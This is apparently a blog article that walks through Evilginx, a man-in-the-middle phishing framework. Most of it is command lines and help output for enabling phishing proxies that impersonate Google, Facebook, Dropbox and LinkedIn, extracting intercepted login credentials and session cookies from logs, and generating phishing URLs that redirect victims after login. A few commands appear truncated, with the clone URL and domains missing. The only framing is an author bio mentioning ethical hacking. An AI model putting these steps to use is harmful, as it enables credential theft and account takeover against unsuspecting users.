Frameworks information gathering tool Vulnerability scanner Windows

Evilginx : Man-In-The-Middle Attack Framework

Written by Mubassir patel


Evilginx tool is a MITM Framework. It’s core runs on Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content, while intercepting traffic between client and server.

Installation Of Evilginx:

Evilginx provides an installation script that takes care of installing the whole package on any Debian wheezy/jessie machine, in fire and forget manner.

git clone
cd evilginx
chmod 700


            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/          v1.0

usage: [-h] {setup,parse,genurl} ...

positional arguments:
    setup               Configure Evilginx.
    parse               Parse log file(s).
    genurl              Generate phishing URL.

optional arguments:
  -h, --help            show this help message and exit


Enable or disable site configurations for use with Nginx server

usage: setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Your phishing domain.
  -y                    Answer all questions with 'Yes'.
  -l, --list            List available supported apps.
  --enable ENABLE       Enable following site by name.
  --disable DISABLE     Disable following site by name.

List available site configuration templates:

python setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

Enable google phishing site with preregistered phishing domain

python setup --enable google -d

Disable facebook phishing site:

python setup --disable facebook

Parse Nginx logs to extract intercepted login credentials and session cookies. Logs, by default, are saved in logs directory, where script resides.

usage: parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs
                        for all sites).
  --debug               Does not truncate log file after parsing.

Parse logs only for google site:

python parse -s google

Parse logs for all available sites:

python parse -s all
Generate URL


usage: genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to generate link for.
  -r REDIRECT, --redirect REDIRECT
                        Redirect user to this URL after successful sign-in.

Generate google phishing URL that will redirect victim to rick’roll video on successful login:

python genurl -s google -r

Generated following phishing URLs:


About the author

Mubassir patel

Mubassir is a founder and developer of this site. He is a computer science engineer. He has a very deep interest in ethical hacking, penetration testing, website development and including all technology topic.

Leave a Comment